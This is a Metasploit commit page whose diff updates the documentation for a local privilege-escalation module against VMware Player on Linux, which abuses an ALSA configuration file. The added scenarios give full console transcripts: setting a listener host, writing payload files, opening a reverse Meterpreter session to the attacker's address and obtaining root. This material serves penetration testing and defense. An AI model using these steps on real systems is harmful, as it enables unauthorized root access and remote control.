Land #11137, Clean up linux/local/vmware_alsa_config exploit module

rapid7 · Dec 21, 2018 · b974280 · b974280
2 parents af60cb6 + d973a58
commit b974280
Show file tree

Hide file tree

Showing 2 changed files with 212 additions and 128 deletions.
diff --git a/documentation/modules/exploit/linux/local/vmware_alsa_config.md b/documentation/modules/exploit/linux/local/vmware_alsa_config.md
@@ -1,15 +1,22 @@
 ## Description
 
-  This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.
+  This module exploits a vulnerability in VMware Workstation Pro and
+  Player on Linux which allows users to escalate their privileges by
+  using an ALSA configuration file to load and execute a shared object
+  as `root` when launching a virtual machine with an attached sound card.
 
 
 ## Vulnerable Application
 
-  VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.
+  VMware Workstation Pro and VMware Workstation Player are the industry
+  standard for running multiple operating systems as virtual machines on
+  a single PC. Thousands of IT professionals, developers and businesses
+  use Workstation Pro and Workstation Player to be more agile, more
+  productive and more secure every day.
 
   This module has been tested successfully on:
 
-  * VMware Player version 12.5.0 on Debian Linux
+  * VMware Player version 12.5.0 on Debian Linux 8 Jessie
 
 
 ## Verification Steps
@@ -20,7 +27,7 @@
   4. Do: `set SESSION [SESSION]`
   5. Do: `check`
   6. Do: `run`
-  7. You should get a new root session
+  7. You should get a new `root` session
 
 
 ## Options
@@ -33,31 +40,72 @@
 
   A writable directory file system path. (default: `/tmp`)
 
+  **Xdisplay**
+
+  Display exploit will attempt to use (default: `:0`)
+
 
 ## Scenarios
 
+### Command Shell Session - VMware Player 12.5.0 (Debian 8 Jessie)
+
   ```
-  msf exploit(vmware_alsa_config) > check
+  msf5 > use exploit/linux/local/vmware_alsa_config 
+  msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(linux/local/vmware_alsa_config) > set session 1
+  session => 1
+  msf5 exploit(linux/local/vmware_alsa_config) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Writing '/tmp/pSvQHD5S5fh/afLaYVIoUm.so.c' (526 bytes) ...
+  [*] Writing '/tmp/pSvQHD5S5fh/pSvQHD5S5fh.vmx' (560 bytes) ...
+  [*] Writing '/tmp/pSvQHD5S5fh/jl7XmpZWdE' (964720 bytes) ...
+  [*] Writing '/home/user/.asoundrc' (116 bytes) ...
+  [*] Launching VMware Player...
+  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.208:57796) at 2018-12-17 02:43:22 -0500
+  [+] Deleted /home/user/.asoundrc
+  [+] Deleted /home/user/Desktop/~/.vmware/preferences
+  [!] Attempting to delete working directory /tmp/pSvQHD5S5fh
+  [-] Exploit failed: negative array size (or size too big)
 
-  [!] SESSION may not be compatible with this module.
-  [+] Target version is vulnerable
-  [+]  The target is vulnerable.
-  msf exploit(vmware_alsa_config) > run
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.208
+  OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+
+### Meterpreter Session - VMware Player 12.5.0 (Debian 8 Jessie)
 
-  [!] SESSION may not be compatible with this module.
-  [*] Started reverse TCP handler on 172.16.191.181:4444 
-  [+] Target version is vulnerable
+  ```
+  msf5 > use exploit/linux/local/vmware_alsa_config 
+  msf5 exploit(linux/local/vmware_alsa_config) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(linux/local/vmware_alsa_config) > set session 1
+  session => 1
+  msf5 exploit(linux/local/vmware_alsa_config) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Writing '/tmp/5irkXF31Iw/GHAPsWBkjix.so.c' (527 bytes) ...
+  [*] Writing '/tmp/5irkXF31Iw/5irkXF31Iw.vmx' (558 bytes) ...
+  [*] Writing '/tmp/5irkXF31Iw/Rxqj9taEcXol' (964720 bytes) ...
+  [*] Writing '/home/user/.asoundrc' (116 bytes) ...
   [*] Launching VMware Player...
-  [*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400
-  [*] Removing /tmp/.baVu7FwzlaIQyp
-  [*] Removing /home/user/.asoundrc
+  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.208:57799) at 2018-12-17 02:46:39 -0500
 
   meterpreter > getuid
   Server username: uid=0, gid=0, euid=0, egid=0
   meterpreter > sysinfo
-  Computer     : 172.16.191.221
+  Computer     : 172.16.191.208
   OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
   Architecture : x64
+  BuildTuple   : x86_64-linux-musl
   Meterpreter  : x64/linux
+  meterpreter > 
   ```